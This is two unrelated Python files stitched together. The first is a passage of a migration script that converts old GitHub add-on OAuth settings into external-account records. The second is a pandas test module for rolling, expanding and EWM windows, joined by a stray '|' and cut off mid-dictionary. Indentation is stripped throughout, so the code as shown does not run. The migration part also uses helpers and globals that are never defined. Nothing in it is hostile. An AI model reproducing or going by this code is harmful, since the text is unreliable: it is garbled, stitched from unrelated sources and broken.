def migrate_to_external_account(user_settings_document, oauth_settings_document):
if not oauth_settings_document.get('oauth_access_token'):
return (None, None, None)
try:
user_info = GitHubClient(access_token=oauth_settings_document['oauth_access_token']).user()
except (GitHubError, ApiError):
user_id = oauth_settings_document['github_user_id']
profile_url = None
display_name = oauth_settings_document['github_user_name']
else:
user_id = user_info.id
profile_url = user_info.html_url
display_name = user_info.login
new = False
user = User.load(user_settings_document['owner'])
try:
external_account = ExternalAccount.find(Q('provider_id', 'eq', user_id))[0]
logger.info('Duplicate account use found: User {0} with github_user_id {1}'.format(user.username, user_id))
except IndexError:
new = True
external_account = ExternalAccount(
provider=PROVIDER,
provider_name=PROVIDER_NAME,
provider_id=user_id,
profile_url=profile_url,
oauth_key=oauth_settings_document['oauth_access_token'],
display_name=display_name,
)
external_account.save()
if not profile_url:
invalid_oauth_creds[external_account._id] = (user_settings_document['_id'], oauth_settings_document['_id'])
logger.info("Created ExternalAccount<_id:{0}> with invalid oauth credentials.".format(
external_account._id
))
user.external_accounts.append(external_account)
user.save()
return external_account, user, new
def make_new_user_settings(user):
# kill backrefs to old models
database['user'].find_and_modify(
{'_id': user._id},
{
'$unset': {
'__backrefs.addons.addongithubusersettings': ''
}
}
)
user.reload()
return user.get_or_add_addon('github', override=True)
def make_new_node_settings(node, node_settings_document, external_account=None, user_settings_instance=None):
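    """Create new github node settings for the node, copying repo, user, hook
    and registration data from the old document, and wire up auth when both an
    external account and a user settings instance are supplied.
    """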
# kill backrefs to old models
database['node'].find_and_modify(
{'_id': node._id},
{
'$unset': {
'__backrefs.addons.addongithubnodesettings': ''
}
}
)
node.reload()
node_settings_instance = node.get_or_add_addon('github', auth=None, override=True, log=False)
node_settings_instance.repo = node_settings_document['repo']
node_settings_instance.user = node_settings_document['user']
node_settings_instance.hook_id = node_settings_document.get('hook_id', None)
node_settings_instance.hook_secret = node_settings_document.get('hook_secret', None)
node_settings_instance.registration_data = node_settings_document['registration_data']
node_settings_instance.save()
if external_account and user_settings_instance:
node_settings_instance.set_auth(
external_account,
user_settings_instance.owner,
log=False
)
return node_settings_instance
def migrate(dry_run=True):
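    """Walk every old addongithubusersettings document, create external
    accounts and new user/node settings for the ones that can be verified,
    and log a summary of everything migrated, repaired or skipped.

    When dry_run is True, a RuntimeError is raised at the end so the
    surrounding transaction rolls back.
    """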
user_settings_list = list(database['addongithubusersettings'].find())
# get in-memory versions of collections and collection sizes
old_user_settings_collection = database['addongithubusersettings']
old_user_settings_count = old_user_settings_collection.count()
old_node_settings_collection = database['addongithubnodesettings']
old_node_settings_count = old_node_settings_collection.count()
old_oauth_settings_collection = database['addongithuboauthsettings']
old_oauth_settings_count = old_oauth_settings_collection.count()
# Lists of IDs for logging purposes
external_accounts_created = []
migrated_user_settings = []
migrated_node_settings = []
user_no_oauth_settings = []
deleted_user_settings = []
broken_user_or_oauth_settings = []
no_oauth_creds = []
inactive_user_or_no_owner = []
unverifiable_node_settings = []
deleted_node_settings = []
nodeless_node_settings = []
for user_settings_document in user_settings_list:
oauth_settings_document = None
try:
if user_settings_document.get('oauth_settings', None):
oauth_settings_document = old_oauth_settings_collection.find_one({'github_user_id': user_settings_document['oauth_settings']})
except KeyError:
pass
if not oauth_settings_document:
logger.info(
"Found addongithubusersettings document (id:{0}) with no associated oauth_settings. It will not be migrated.".format(user_settings_document['_id'])
)
user_no_oauth_settings.append(user_settings_document['_id'])
continue
if user_settings_document['deleted']:
logger.info(
"Found addongithubusersettings document (id:{0}) that is marked as deleted.".format(user_settings_document['_id'])
)
deleted_user_settings.append(user_settings_document['_id'])
continue
if not verify_user_and_oauth_settings_documents(user_settings_document, oauth_settings_document):
logger.info(
"Found broken addongithubusersettings document (id:{0}) that could not be fixed.".format(user_settings_document['_id'])
)
broken_user_or_oauth_settings.append((user_settings_document['_id'], oauth_settings_document['_id']))
continue
external_account, user, new = migrate_to_external_account(user_settings_document, oauth_settings_document)
if not external_account:
logger.info("AddonGitHubUserSettings<_id:{0}> has no oauth credentials and will not be migrated.".format(
user_settings_document['_id']
))
no_oauth_creds.append(user_settings_document['_id'])
continue
else:
if new:
external_accounts_created.append(external_account._id)
linked_node_settings_documents = old_node_settings_collection.find({
'user_settings': user_settings_document['_id']
})
if not user or not user.is_active:
            # user may be None here, so guard before touching is_merged
            if linked_node_settings_documents.count() and (user is None or not user.is_merged):
logger.warn("AddonGitHubUserSettings<_id:{0}> has no owner, but is used by AddonGitHubNodeSettings: {1}.".format(
user_settings_document['_id'],
', '.join([each['_id'] for each in linked_node_settings_documents])
))
raise RuntimeError("This should never happen.")
else:
logger.info("AddonGitHubUserSettings<_id:{0}> either has no owner or the owner's account is not active, and will not be migrated.".format(
user_settings_document['_id']
))
inactive_user_or_no_owner.append(user_settings_document['_id'])
continue
else:
user_settings_instance = make_new_user_settings(user)
for node_settings_document in linked_node_settings_documents:
if not verify_node_settings_document(node_settings_document, external_account):
logger.info(
"Found addongithubnodesettings document (id:{0}) that could not be verified. It will not be migrated.".format(
node_settings_document['_id'],
)
)
unverifiable_node_settings.append((node_settings_document['_id'], external_account._id))
continue
if node_settings_document['deleted']:
logger.info(
"Found addongithubnodesettings document (id:{0}) that is marked as deleted.".format(
node_settings_document['_id'],
)
)
deleted_node_settings.append(node_settings_document['_id'])
continue
node = Node.load(node_settings_document['owner'])
if not node:
logger.info("AddonGitHubNodeSettings<_id:{0}> has no associated Node, and will not be migrated.".format(
node_settings_document['_id']
))
nodeless_node_settings.append(node_settings_document['_id'])
continue
else:
node_settings_document = database['addongithubnodesettings'].find_one({'_id': node_settings_document['_id']})
make_new_node_settings(
node,
node_settings_document,
external_account,
user_settings_instance
)
migrated_node_settings.append(node_settings_document['_id'])
migrated_user_settings.append(user_settings_document['_id'])
logger.info(
"Created {0} new external accounts from {1} old oauth settings documents:\n{2}".format(
len(external_accounts_created), old_oauth_settings_count, [e for e in external_accounts_created]
)
)
logger.info(
"Successfully migrated {0} user settings from {1} old user settings documents:\n{2}".format(
len(migrated_user_settings), old_user_settings_count, [e for e in migrated_user_settings]
)
)
logger.info(
"Successfully migrated {0} node settings from {1} old node settings documents:\n{2}".format(
len(migrated_node_settings), old_node_settings_count, [e for e in migrated_node_settings]
)
)
if user_no_oauth_settings:
logger.warn(
"Skipped {0} user settings due to a lack of associated oauth settings:\n{1}".format(
len(user_no_oauth_settings), [e for e in user_no_oauth_settings]
)
)
if deleted_user_settings:
logger.warn(
"Skipped {0} deleted user settings: {1}".format(
len(deleted_user_settings), [e for e in deleted_user_settings]
)
)
if broken_user_or_oauth_settings:
logger.warn(
"Skipped {0} (user, oauth) settings tuples because they could not be verified:\n{1}".format(
len(broken_user_or_oauth_settings), ['({}, {})'.format(e, f) for e, f in broken_user_or_oauth_settings]
)
)
if invalid_oauth_creds:
logger.warn(
"Created {0} invalid ExternalAccounts from (user, oauth) settings tuples due to invalid oauth credentials:\n{1}".format(
len(invalid_oauth_creds), ['{}: ({}, {})'.format(e, invalid_oauth_creds[e][0], invalid_oauth_creds[e][1]) for e in invalid_oauth_creds.keys()]
)
)
if inactive_user_or_no_owner:
logger.warn(
"Skipped {0} user settings due to an inactive or null owner:\n{1}".format(
len(inactive_user_or_no_owner), [e for e in inactive_user_or_no_owner]
)
)
if no_oauth_creds:
logger.warn(
"Skipped {0} user settings due a lack of oauth credentials:\n{1}".format(
len(no_oauth_creds), [e for e in no_oauth_creds]
)
)
if settings_need_repair:
logger.warn(
"Made GH API calls for {0} node settings documents with external accounts because they needed to be repaired:\n{1}".format(
len(settings_need_repair), ['({}, {})'.format(e, f) for e, f in settings_need_repair]
)
)
if unverifiable_node_settings:
logger.warn(
"Skipped {0} (node settings, external_account) tuples because they could not be verified or repaired:\n{1}".format(
len(unverifiable_node_settings), ['({}, {})'.format(e, f) for e, f in unverifiable_node_settings]
)
)
if deleted_node_settings:
logger.warn(
"Skipped {0} deleted node settings:\n{1}".format(
len(deleted_node_settings), [e for e in deleted_node_settings]
)
)
if nodeless_node_settings:
logger.warn(
"Skipped {0} node settings without an associated node:\n{1}".format(
len(nodeless_node_settings), [e for e in nodeless_node_settings]
)
)
if dry_run:
raise RuntimeError('Dry run, transaction rolled back.')
def main():
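    """Parse the --dry flag, set up logging and the app, and run the
    migration inside a TokuTransaction.
    """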
dry_run = False
remove_old = True
if '--dry' in sys.argv:
dry_run = True
if not dry_run:
script_utils.add_file_logger(logger, __file__)
init_app(set_backends=True, routes=False)
with TokuTransaction():
migrate(dry_run=dry_run)
if __name__ == "__main__":
main()
|
from itertools import product
import pytest
import warnings
from warnings import catch_warnings
from datetime import datetime, timedelta
from numpy.random import randn
import numpy as np
from pandas import _np_version_under1p12
import pandas as pd
from pandas import (Series, DataFrame, bdate_range,
isna, notna, concat, Timestamp, Index)
import pandas.core.window as rwindow
import pandas.tseries.offsets as offsets
from pandas.core.base import SpecificationError
from pandas.errors import UnsupportedFunctionCall
from pandas.core.sorting import safe_sort
import pandas.util.testing as tm
import pandas.util._test_decorators as td
from pandas.compat import range, zip
N, K = 100, 10
def assert_equal(left, right):
if isinstance(left, Series):
tm.assert_series_equal(left, right)
else:
tm.assert_frame_equal(left, right)
@pytest.fixture(params=[True, False])
def raw(request):
return request.param
@pytest.fixture(params=['triang', 'blackman', 'hamming', 'bartlett', 'bohman',
'blackmanharris', 'nuttall', 'barthann'])
def win_types(request):
return request.param
@pytest.fixture(params=['kaiser', 'gaussian', 'general_gaussian'])
def win_types_special(request):
return request.param
class Base(object):
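    """Shared fixture data for the window tests: a Series and DataFrame of
    random values on a business-day index, with a block of NaNs injected at
    the positions in _nan_locs.
    """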
_nan_locs = np.arange(20, 40)
_inf_locs = np.array([])
def _create_data(self):
arr = randn(N)
arr[self._nan_locs] = np.NaN
self.arr = arr
self.rng = bdate_range(datetime(2009, 1, 1), periods=N)
self.series = Series(arr.copy(), index=self.rng)
self.frame = DataFrame(randn(N, K), index=self.rng,
columns=np.arange(K))
class TestApi(Base):
def setup_method(self, method):
self._create_data()
def test_getitem(self):
r = self.frame.rolling(window=5)
tm.assert_index_equal(r._selected_obj.columns, self.frame.columns)
r = self.frame.rolling(window=5)[1]
assert r._selected_obj.name == self.frame.columns[1]
# technically this is allowed
r = self.frame.rolling(window=5)[1, 3]
tm.assert_index_equal(r._selected_obj.columns,
self.frame.columns[[1, 3]])
r = self.frame.rolling(window=5)[[1, 3]]
tm.assert_index_equal(r._selected_obj.columns,
self.frame.columns[[1, 3]])
def test_select_bad_cols(self):
df = DataFrame([[1, 2]], columns=['A', 'B'])
g = df.rolling(window=5)
pytest.raises(KeyError, g.__getitem__, ['C']) # g[['C']]
pytest.raises(KeyError, g.__getitem__, ['A', 'C']) # g[['A', 'C']]
with tm.assert_raises_regex(KeyError, '^[^A]+$'):
# A should not be referenced as a bad column...
# will have to rethink regex if you change message!
g[['A', 'C']]
def test_attribute_access(self):
df = DataFrame([[1, 2]], columns=['A', 'B'])
r = df.rolling(window=5)
tm.assert_series_equal(r.A.sum(), r['A'].sum())
pytest.raises(AttributeError, lambda: r.F)
def tests_skip_nuisance(self):
df = DataFrame({'A': range(5), 'B': range(5, 10), 'C': 'foo'})
r = df.rolling(window=3)
result = r[['A', 'B']].sum()
expected = DataFrame({'A': [np.nan, np.nan, 3, 6, 9],
'B': [np.nan, np.nan, 18, 21, 24]},
columns=list('AB'))
tm.assert_frame_equal(result, expected)
def test_skip_sum_object_raises(self):
df = DataFrame({'A': range(5), 'B': range(5, 10), 'C': 'foo'})
r = df.rolling(window=3)
with tm.assert_raises_regex(TypeError, 'cannot handle this type'):
r.sum()
def test_agg(self):
df = DataFrame({'A': range(5), 'B': range(0, 10, 2)})
r = df.rolling(window=3)
a_mean = r['A'].mean()
a_std = r['A'].std()
a_sum = r['A'].sum()
b_mean = r['B'].mean()
b_std = r['B'].std()
b_sum = r['B'].sum()
result = r.aggregate([np.mean, np.std])
expected = concat([a_mean, a_std, b_mean, b_std], axis=1)
expected.columns = pd.MultiIndex.from_product([['A', 'B'], ['mean',
'std']])
tm.assert_frame_equal(result, expected)
result = r.aggregate({'A': np.mean, 'B': np.std})
expected = concat([a_mean, b_std], axis=1)
tm.assert_frame_equal(result, expected, check_like=True)
result = r.aggregate({'A': ['mean', 'std']})
expected = concat([a_mean, a_std], axis=1)
expected.columns = pd.MultiIndex.from_tuples([('A', 'mean'), ('A',
'std')])
tm.assert_frame_equal(result, expected)
result = r['A'].aggregate(['mean', 'sum'])
expected = concat([a_mean, a_sum], axis=1)
expected.columns = ['mean', 'sum']
tm.assert_frame_equal(result, expected)
with catch_warnings(record=True):
result = r.aggregate({'A': {'mean': 'mean', 'sum': 'sum'}})
expected = concat([a_mean, a_sum], axis=1)
expected.columns = pd.MultiIndex.from_tuples([('A', 'mean'),
('A', 'sum')])
tm.assert_frame_equal(result, expected, check_like=True)
with catch_warnings(record=True):
result = r.aggregate({'A': {'mean': 'mean',
'sum': 'sum'},
'B': {'mean2': 'mean',
'sum2': 'sum'}})
expected = concat([a_mean, a_sum, b_mean, b_sum], axis=1)
exp_cols = [('A', 'mean'), ('A', 'sum'), ('B', 'mean2'), ('B', 'sum2')]
expected.columns = pd.MultiIndex.from_tuples(exp_cols)
tm.assert_frame_equal(result, expected, check_like=True)
result = r.aggregate({'A': ['mean', 'std'], 'B': ['mean', 'std']})
expected = concat([a_mean, a_std, b_mean, b_std], axis=1)
exp_cols = [('A', 'mean'), ('A', 'std'), ('B', 'mean'), ('B', 'std')]
expected.columns = pd.MultiIndex.from_tuples(exp_cols)
tm.assert_frame_equal(result, expected, check_like=True)
def test_agg_apply(self, raw):
# passed lambda
df = DataFrame({'A': range(5), 'B': range(0, 10, 2)})
r = df.rolling(window=3)
a_sum = r['A'].sum()
result = r.agg({'A': np.sum, 'B': lambda x: np.std(x, ddof=1)})
rcustom = r['B'].apply(lambda x: np.std(x, ddof=1), raw=raw)
expected = concat([a_sum, rcustom], axis=1)
tm.assert_frame_equal(result, expected, check_like=True)
def test_agg_consistency(self):
df = DataFrame({'A': range(5), 'B': range(0, 10, 2)})
r = df.rolling(window=3)
result = r.agg([np.sum, np.mean]).columns
expected = pd.MultiIndex.from_product([list('AB'), ['sum', 'mean']])
tm.assert_index_equal(result, expected)
result = r['A'].agg([np.sum, np.mean]).columns
expected = Index(['sum', 'mean'])
tm.assert_index_equal(result, expected)
result = r.agg({'A': [np.sum, np.mean]}).columns
expected = pd.MultiIndex.from_tuples([('A', 'sum'), ('A', 'mean')])
tm.assert_index_equal(result, expected)
def test_agg_nested_dicts(self):
# API change for disallowing these types of nested dicts
df = DataFrame({'A': range(5), 'B': range(0, 10, 2)})
r = df.rolling(window=3)
def f():
r.aggregate({'r1': {'A': ['mean', 'sum']},
'r2': {'B': ['mean', 'sum']}})
pytest.raises(SpecificationError, f)
expected = concat([r['A'].mean(), r['A'].std(),
r['B'].mean(), r['B'].std()], axis=1)
expected.columns = pd.MultiIndex.from_tuples([('ra', 'mean'), (
'ra', 'std'), ('rb', 'mean'), ('rb', 'std')])
with catch_warnings(record=True):
result = r[['A', 'B']].agg({'A': {'ra': ['mean', 'std']},
'B': {'rb': ['mean', 'std']}})
tm.assert_frame_equal(result, expected, check_like=True)
with catch_warnings(record=True):
result = r.agg({'A': {'ra': ['mean', 'std']},
'B': {'rb': ['mean', 'std']}})
expected.columns = pd.MultiIndex.from_tuples([('A', 'ra', 'mean'), (
'A', 'ra', 'std'), ('B', 'rb', 'mean'), ('B', 'rb', 'std')])
tm.assert_frame_equal(result, expected, check_like=True)
def test_count_nonnumeric_types(self):
# GH12541
cols = ['int', 'float', 'string', 'datetime', 'timedelta', 'periods',
'fl_inf', 'fl_nan', 'str_nan', 'dt_nat', 'periods_nat']
df = DataFrame(
{'int': [1, 2, 3],
'float': [4., 5., 6.],
'string': list('abc'),
'datetime': pd.date_range('20170101', periods=3),
'timedelta': pd.timedelta_range('1 s', periods=3, freq='s'),
'periods': [pd.Period('2012-01'), pd.Period('2012-02'),
pd.Period('2012-03')],
'fl_inf': [1., 2., np.Inf],
'fl_nan': [1., 2., np.NaN],
'str_nan': ['aa', 'bb', np.NaN],
'dt_nat': [Timestamp('20170101'), Timestamp('20170203'),
Timestamp(None)],
'periods_nat': [pd.Period('2012-01'), pd.Period('2012-02'),
pd.Period(None)]},
columns=cols)
expected = DataFrame(
{'int': [1., 2., 2.],
'float': [1., 2., 2.],
'string': [1., 2., 2.],
'datetime': [1., 2., 2.],
'timedelta': [1., 2., 2.],
'periods': [1., 2., 2.],
'fl_inf': [1., 2., 2.],
'fl_nan': [1., 2., 1.],
'str_nan': [1., 2., 1.],
'dt_nat': [1., 2., 1.],
'periods_nat': [1., 2., 1.]},
columns=cols)
result = df.rolling(window=2).count()
tm.assert_frame_equal(result, expected)
result = df.rolling(1).count()
expected = df.notna().astype(float)
tm.assert_frame_equal(result, expected)
@td.skip_if_no_scipy
def test_window_with_args(self):
# make sure that we are aggregating window functions correctly with arg
r = Series(np.random.randn(100)).rolling(window=10, min_periods=1,
win_type='gaussian')
expected = concat([r.mean(std=10), r.mean(std=.01)], axis=1)
expected.columns = ['<lambda>', '<lambda>']
result = r.aggregate([lambda x: x.mean(std=10),
lambda x: x.mean(std=.01)])
tm.assert_frame_equal(result, expected)
def a(x):
return x.mean(std=10)
def b(x):
return x.mean(std=0.01)
expected = concat([r.mean(std=10), r.mean(std=.01)], axis=1)
expected.columns = ['a', 'b']
result = r.aggregate([a, b])
tm.assert_frame_equal(result, expected)
def test_preserve_metadata(self):
# GH 10565
s = Series(np.arange(100), name='foo')
s2 = s.rolling(30).sum()
s3 = s.rolling(20).sum()
assert s2.name == 'foo'
assert s3.name == 'foo'
class TestWindow(Base):
def setup_method(self, method):
self._create_data()
@td.skip_if_no_scipy
@pytest.mark.parametrize(
'which', ['series', 'frame'])
def test_constructor(self, which):
# GH 12669
o = getattr(self, which)
c = o.rolling
# valid
c(win_type='boxcar', window=2, min_periods=1)
c(win_type='boxcar', window=2, min_periods=1, center=True)
c(win_type='boxcar', window=2, min_periods=1, center=False)
# not valid
for w in [2., 'foo', np.array([2])]:
with pytest.raises(ValueError):
c(win_type='boxcar', window=2, min_periods=w)
with pytest.raises(ValueError):
c(win_type='boxcar', window=2, min_periods=1, center=w)
for wt in ['foobar', 1]:
with pytest.raises(ValueError):
c(win_type=wt, window=2)
@td.skip_if_no_scipy
@pytest.mark.parametrize(
'which', ['series', 'frame'])
def test_constructor_with_win_type(self, which, win_types):
# GH 12669
o = getattr(self, which)
c = o.rolling
c(win_type=win_types, window=2)
@pytest.mark.parametrize(
'method', ['sum', 'mean'])
def test_numpy_compat(self, method):
# see gh-12811
w = rwindow.Window(Series([2, 4, 6]), window=[0, 2])
msg = "numpy operations are not valid with window objects"
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(w, method), 1, 2, 3)
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(w, method), dtype=np.float64)
class TestRolling(Base):
def setup_method(self, method):
self._create_data()
def test_doc_string(self):
df = DataFrame({'B': [0, 1, 2, np.nan, 4]})
df
df.rolling(2).sum()
df.rolling(2, min_periods=1).sum()
@pytest.mark.parametrize(
'which', ['series', 'frame'])
def test_constructor(self, which):
# GH 12669
o = getattr(self, which)
c = o.rolling
# valid
c(window=2)
c(window=2, min_periods=1)
c(window=2, min_periods=1, center=True)
c(window=2, min_periods=1, center=False)
# GH 13383
with pytest.raises(ValueError):
c(0)
c(-1)
# not valid
for w in [2., 'foo', np.array([2])]:
with pytest.raises(ValueError):
c(window=w)
with pytest.raises(ValueError):
c(window=2, min_periods=w)
with pytest.raises(ValueError):
c(window=2, min_periods=1, center=w)
@td.skip_if_no_scipy
@pytest.mark.parametrize(
'which', ['series', 'frame'])
def test_constructor_with_win_type(self, which):
# GH 13383
o = getattr(self, which)
c = o.rolling
with pytest.raises(ValueError):
c(-1, win_type='boxcar')
@pytest.mark.parametrize(
'window', [timedelta(days=3), pd.Timedelta(days=3)])
def test_constructor_with_timedelta_window(self, window):
# GH 15440
n = 10
df = DataFrame({'value': np.arange(n)},
index=pd.date_range('2015-12-24', periods=n, freq="D"))
expected_data = np.append([0., 1.], np.arange(3., 27., 3))
result = df.rolling(window=window).sum()
expected = DataFrame({'value': expected_data},
index=pd.date_range('2015-12-24', periods=n,
freq="D"))
tm.assert_frame_equal(result, expected)
expected = df.rolling('3D').sum()
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
'window', [timedelta(days=3), pd.Timedelta(days=3), '3D'])
def test_constructor_timedelta_window_and_minperiods(self, window, raw):
# GH 15305
n = 10
df = DataFrame({'value': np.arange(n)},
index=pd.date_range('2017-08-08', periods=n, freq="D"))
expected = DataFrame(
{'value': np.append([np.NaN, 1.], np.arange(3., 27., 3))},
index=pd.date_range('2017-08-08', periods=n, freq="D"))
result_roll_sum = df.rolling(window=window, min_periods=2).sum()
result_roll_generic = df.rolling(window=window,
min_periods=2).apply(sum, raw=raw)
tm.assert_frame_equal(result_roll_sum, expected)
tm.assert_frame_equal(result_roll_generic, expected)
@pytest.mark.parametrize(
'method', ['std', 'mean', 'sum', 'max', 'min', 'var'])
def test_numpy_compat(self, method):
# see gh-12811
r = rwindow.Rolling(Series([2, 4, 6]), window=2)
msg = "numpy operations are not valid with window objects"
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(r, method), 1, 2, 3)
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(r, method), dtype=np.float64)
def test_closed(self):
df = DataFrame({'A': [0, 1, 2, 3, 4]})
# closed only allowed for datetimelike
with pytest.raises(ValueError):
df.rolling(window=3, closed='neither')
@pytest.mark.parametrize('roller', ['1s', 1])
def tests_empty_df_rolling(self, roller):
# GH 15819 Verifies that datetime and integer rolling windows can be
# applied to empty DataFrames
expected = DataFrame()
result = DataFrame().rolling(roller).sum()
tm.assert_frame_equal(result, expected)
# Verifies that datetime and integer rolling windows can be applied to
# empty DataFrames with datetime index
expected = DataFrame(index=pd.DatetimeIndex([]))
result = DataFrame(index=pd.DatetimeIndex([])).rolling(roller).sum()
tm.assert_frame_equal(result, expected)
def test_missing_minp_zero(self):
# https://github.com/pandas-dev/pandas/pull/18921
# minp=0
x = pd.Series([np.nan])
result = x.rolling(1, min_periods=0).sum()
expected = pd.Series([0.0])
tm.assert_series_equal(result, expected)
# minp=1
result = x.rolling(1, min_periods=1).sum()
expected = pd.Series([np.nan])
tm.assert_series_equal(result, expected)
def test_missing_minp_zero_variable(self):
# https://github.com/pandas-dev/pandas/pull/18921
x = pd.Series([np.nan] * 4,
index=pd.DatetimeIndex(['2017-01-01', '2017-01-04',
'2017-01-06', '2017-01-07']))
result = x.rolling(pd.Timedelta("2d"), min_periods=0).sum()
expected = pd.Series(0.0, index=x.index)
tm.assert_series_equal(result, expected)
def test_multi_index_names(self):
# GH 16789, 16825
cols = pd.MultiIndex.from_product([['A', 'B'], ['C', 'D', 'E']],
names=['1', '2'])
df = DataFrame(np.ones((10, 6)), columns=cols)
result = df.rolling(3).cov()
tm.assert_index_equal(result.columns, df.columns)
assert result.index.names == [None, '1', '2']
@pytest.mark.parametrize('klass', [pd.Series, pd.DataFrame])
def test_iter_raises(self, klass):
# https://github.com/pandas-dev/pandas/issues/11704
# Iteration over a Window
obj = klass([1, 2, 3, 4])
with pytest.raises(NotImplementedError):
iter(obj.rolling(2))
class TestExpanding(Base):
def setup_method(self, method):
self._create_data()
def test_doc_string(self):
df = DataFrame({'B': [0, 1, 2, np.nan, 4]})
df
df.expanding(2).sum()
@pytest.mark.parametrize(
'which', ['series', 'frame'])
def test_constructor(self, which):
# GH 12669
o = getattr(self, which)
c = o.expanding
# valid
c(min_periods=1)
c(min_periods=1, center=True)
c(min_periods=1, center=False)
# not valid
for w in [2., 'foo', np.array([2])]:
with pytest.raises(ValueError):
c(min_periods=w)
with pytest.raises(ValueError):
c(min_periods=1, center=w)
@pytest.mark.parametrize(
'method', ['std', 'mean', 'sum', 'max', 'min', 'var'])
def test_numpy_compat(self, method):
# see gh-12811
e = rwindow.Expanding(Series([2, 4, 6]), window=2)
msg = "numpy operations are not valid with window objects"
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(e, method), 1, 2, 3)
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(e, method), dtype=np.float64)
@pytest.mark.parametrize(
'expander',
[1, pytest.param('ls', marks=pytest.mark.xfail(
reason='GH 16425 expanding with '
'offset not supported'))])
def test_empty_df_expanding(self, expander):
# GH 15819 Verifies that datetime and integer expanding windows can be
# applied to empty DataFrames
expected = DataFrame()
result = DataFrame().expanding(expander).sum()
tm.assert_frame_equal(result, expected)
# Verifies that datetime and integer expanding windows can be applied
# to empty DataFrames with datetime index
expected = DataFrame(index=pd.DatetimeIndex([]))
result = DataFrame(
index=pd.DatetimeIndex([])).expanding(expander).sum()
tm.assert_frame_equal(result, expected)
def test_missing_minp_zero(self):
# https://github.com/pandas-dev/pandas/pull/18921
# minp=0
x = pd.Series([np.nan])
result = x.expanding(min_periods=0).sum()
expected = pd.Series([0.0])
tm.assert_series_equal(result, expected)
# minp=1
result = x.expanding(min_periods=1).sum()
expected = pd.Series([np.nan])
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize('klass', [pd.Series, pd.DataFrame])
def test_iter_raises(self, klass):
# https://github.com/pandas-dev/pandas/issues/11704
# Iteration over a Window
obj = klass([1, 2, 3, 4])
with pytest.raises(NotImplementedError):
iter(obj.expanding(2))
class TestEWM(Base):
def setup_method(self, method):
self._create_data()
def test_doc_string(self):
df = DataFrame({'B': [0, 1, 2, np.nan, 4]})
df
df.ewm(com=0.5).mean()
@pytest.mark.parametrize(
'which', ['series', 'frame'])
def test_constructor(self, which):
o = getattr(self, which)
c = o.ewm
# valid
c(com=0.5)
c(span=1.5)
c(alpha=0.5)
c(halflife=0.75)
c(com=0.5, span=None)
c(alpha=0.5, com=None)
c(halflife=0.75, alpha=None)
# not valid: mutually exclusive
with pytest.raises(ValueError):
c(com=0.5, alpha=0.5)
with pytest.raises(ValueError):
c(span=1.5, halflife=0.75)
with pytest.raises(ValueError):
c(alpha=0.5, span=1.5)
# not valid: com < 0
with pytest.raises(ValueError):
c(com=-0.5)
# not valid: span < 1
with pytest.raises(ValueError):
c(span=0.5)
# not valid: halflife <= 0
with pytest.raises(ValueError):
c(halflife=0)
# not valid: alpha <= 0 or alpha > 1
for alpha in (-0.5, 1.5):
with pytest.raises(ValueError):
c(alpha=alpha)
@pytest.mark.parametrize(
'method', ['std', 'mean', 'var'])
def test_numpy_compat(self, method):
# see gh-12811
e = rwindow.EWM(Series([2, 4, 6]), alpha=0.5)
msg = "numpy operations are not valid with window objects"
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(e, method), 1, 2, 3)
tm.assert_raises_regex(UnsupportedFunctionCall, msg,
getattr(e, method), dtype=np.float64)
# gh-12373 : rolling functions error on float32 data
# make sure rolling functions work for different dtypes
#
# NOTE that _create_data is called explicitly inside test_dtypes for these
# parametrized Dtype classes rather than via setup_method.
#
# further note that we are only checking rolling for full dtype
# compliance (though both expanding and ewm inherit)
class Dtype(object):
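    """Base class for the dtype-coverage tests: rolls a window of size 2 over
    small Series/DataFrames of a given dtype and compares each aggregation in
    `funcs` against the hard-coded expectations from get_expects().
    """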
window = 2
funcs = {
'count': lambda v: v.count(),
'max': lambda v: v.max(),
'min': lambda v: v.min(),
'sum': lambda v: v.sum(),
'mean': lambda v: v.mean(),
'std': lambda v: v.std(),
'var': lambda v: v.var(),
'median': lambda v: v.median()
}
def get_expects(self):
expects = {
'sr1': {
'count': Series([1, 2, 2, 2, 2], dtype='float64'),
'max': Series([np.nan, 1, 2, 3, 4], dtype='float64'),
'min': Series([np.nan, 0, 1, 2, 3], dtype='float64'),
'sum': Series([np.nan, 1, 3, 5, 7], dtype='float64'),
'mean': Series([np.nan, .5, 1.5, 2.5, 3.5], dtype='float64'),
'std': Series([np.nan] + [np.sqrt(.5)] * 4, dtype='float64'),
'var': Series([np.nan, .5, .5, .5, .5], dtype='float64'),
'median': Series([np.nan, .5, 1.5, 2.5, 3.5], dtype='float64')
},
'sr2': {
'count': Series([1, 2, 2, 2, 2], dtype='float64'),
'max': Series([np.nan, 10, 8, 6, 4], dtype='float64'),
'min': Series([np.nan, 8, 6, 4, 2], dtype='float64'),
'sum': Series([np.nan, 18, 14, 10, 6], dtype='float64'),
'mean': Series([np.nan, 9, 7, 5, 3], dtype='float64'),
'std': Series([np.nan] + [np.sqrt(2)] * 4, dtype='float64'),
'var': Series([np.nan, 2, 2, 2, 2], dtype='float64'),
'median': Series([np.nan, 9, 7, 5, 3], dtype='float64')
},
'df': {
'count': DataFrame({0: Series([1, 2, 2, 2, 2]),
1: Series([1, 2, 2, 2, 2])},
dtype='float64'),
'max': DataFrame({0: Series([np.nan, 2, 4, 6, 8]),
1: Series([np.nan, 3, 5, 7, 9])},
dtype='float64'),
'min': DataFrame({0: Series([np.nan, 0, 2, 4, 6]),
1: Series([np.nan, 1, 3, 5, 7])},
dtype='float64'),
'sum': DataFrame({0: Series([np.nan, 2, 6, 10, 14]),
1: Series([np.nan, 4, 8, 12, 16])},
dtype='float64'),
'mean': DataFrame({0: Series([np.nan, 1, 3, 5, 7]),
1: Series([np.nan, 2, 4, 6, 8])},
dtype='float64'),
'std': DataFrame({0: Series([np.nan] + [np.sqrt(2)] * 4),
1: Series([np.nan] + [np.sqrt(2)] * 4)},
dtype='float64'),
'var': DataFrame({0: Series([np.nan, 2, 2, 2, 2]),
1: Series([np.nan, 2, 2, 2, 2])},
dtype='float64'),
'median': DataFrame({0: Series([np.nan, 1, 3, 5, 7]),
1: Series([np.nan, 2, 4, 6, 8])},
dtype='float64'),
}
